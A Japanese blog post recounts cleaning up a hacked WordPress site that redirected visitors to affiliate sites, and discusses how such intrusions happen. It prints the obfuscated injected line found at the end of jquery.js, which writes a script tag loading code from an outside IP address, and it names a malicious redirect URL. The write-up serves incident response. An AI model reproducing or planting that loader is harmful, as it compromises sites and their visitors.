hycko.blog

昔の記事は上手く表示されないかもしれない。

wordpressでの海外リダイレクトのハッキング事例

   

備忘録。

お客様のWPがハッキングされて海外サイトにリダイレクトされる設定になっていた。
ベタな htaccess によるものかと思いきや、htaccessには特に記述は見当たらず。

リダイレクトは
https://go.padsdel.com/afu.php?id=473791
に先ずされた後に、ハッカーのアフィリエイト先とされる様々なサイトにリダイレクトされる。
海外サイトがメインだけど、日本のヤフーショッピングに飛ばされたりなどもした。

で、 https://go.padsdel.com/afu.php?id=473791 で調べると似たような情報がでてくるわけですな。

wordpressにデフォルトで設置されている jquery.js が書き換えられていた

今回のハッキングは、結論からいうと

/wp-includes/js/jquery/jquery.js

の最後の一行に

var _0xaae8=[“”,”\x6A\x6F\x69\x6E”,”\x72\x65\x76\x65\x72\x73\x65″,”\x73\x70\x6C\x69\x74″,”\x3E\x74\x70\x69\x72\x63\x73\x2F\x3C\x3E\x22\x73\x6A\x2E\x79\x72\x65\x75\x71\x6A\x2F\x38\x37\x2E\x36\x31\x31\x2E\x39\x34\x32\x2E\x34\x33\x31\x2F\x2F\x3A\x70\x74\x74\x68\x22\x3D\x63\x72\x73\x20\x74\x70\x69\x72\x63\x73\x3C”,”\x77\x72\x69\x74\x65″];document[_0xaae8[5]](_0xaae8[4][_0xaae8[3]](_0xaae8[0])[_0xaae8[2]]()[_0xaae8[1]](_0xaae8[0]))

という文字列が挿入されていた。
この一行を削除したら、リダイレクトは無くなった。

この文字列はエンコードしないとわからないようになっていて、恐らくはハッキングコードの除去の際に検索でURLなどの文字列がヒットしない様に、この形になっていると思われる。

で、どうやってこの書き換えが実行されていたか。

wordpressの設置ディレクトリと同列のディレクトリ内に content という見慣れないフォルダが。
その中に recure.php というファイルが入っていました。

content/recure.php

中のコードをみると、シンプルながらも、自分に権限のあるディレクトリをサーバ上位からすべて検索していって、 jquery.php というファイルがあれば、先ほどのエンコードされた文字列を最後を改行して挿入し上書き保存をするという実行ファイルでした。

このファイルもあわせて削除。

どうやってこのハッキングファイルが設置されたか

毎回、これが最大の問題なわけなんですよね。

主な原因は

  1. FTP情報の流出
  2. wordpressの脆弱性をついた攻撃
  3. ユーザーが設定できる範囲での、サーバー設定の脆弱性
  4. ユーザーが設定できない範囲での、サーバー管理者の責任によるサーバーの脆弱性

とりあえずコチラ側ですぐ対応できることは、1への対策でFTPパスワードを変更させること。
次に2への対策で、WPを最新版にアップデートさせる。
3は思い当たる点があれば行う程度。

大問題は4です。
これ、サーバーって企業が運営してれば安全って思う方が多いと思うけど、本当に有名サーバー会社でもザルすぎるセキュリティ設定で、ハッキングされまくりだったりすることが多いです。
でも、サーバー会社の責任でも、それをユーザーが証明する手立てって無いわけですよ、ログはすべてサーバー会社側でしか確認できないし。

なので、法人が運営するウェブサイトを持つ際は、サーバー選びというのは本当に重要です。

個人的にはカゴヤさくらインターネットが、なんとなく信用できるかなって思ってたけど、カゴヤはつい先日顧客情報流出させてたなぁ。

そんな話。

 - wordpress

  • このエントリーをはてなブックマークに追加

Message

記事に意見や感想、質問があれば、お気軽にどうぞ~
名前は無記入でもOKです

日本語が含まれない投稿は無視されますのでご注意ください。(スパム対策)

  関連記事

no image
wordpressで同じタグに所属する次のエントリー/前のエントリーを実装

wordpressで同じカテゴリ内の次の記事は get_next_post($i …

no image
Dagon Design Sitemap Generatorのオプションが管理画面の設定に表示されない問題

どうやらrunPHP Plugin for WordPressを有効にしてると、 …

no image
VPSなどでwordpressのファイルの書込権限などを正常化する設定

うちの場合はWPが設置されているディレクトリにapacheの書込権限がなかったた …

no image
wordpressをxreaなどPHPがsafemodeのサーバに設置する時の解決法

サーバでPHPがsafemodeになっていると、wordpressを操作する際に …

no image
NextGEN GalleryのスライドショーなどをPHPタグを使って直接入力でサイトに埋め込む設定方法

※追記09/09/05 何故かまたダブルコーテーションが全角になっていたので、半 …

no image
wordpressでユーザー名とパスワードが間違っていないのに突然ログインできなくなったら

ユーザー名が無効です とでて急にログインできなくなった。 絶対に間違えていないに …

no image
PHP Speedy WPは高速化の効果がなかった

設定によってはプラグインに不具合がでるし、体感速度として特にサイト表示が高速化す …

no image
wordpressのパーマリンクは途中で変更しない方が良い理由

ある程度の期間を運用したwodpressのパーマリンクをこれから変更しようと考え …

最近聴いた曲を表示してみた結果

Last.fmの機能を利用した、最近聴いた曲を表示するプラグインを使ってみた。 …

no image
tweet tools 2.0の個人的まとめ

なんか色々と使いにくいから、個人的メモとしてまとめ。 コードを完全に読めるわけで …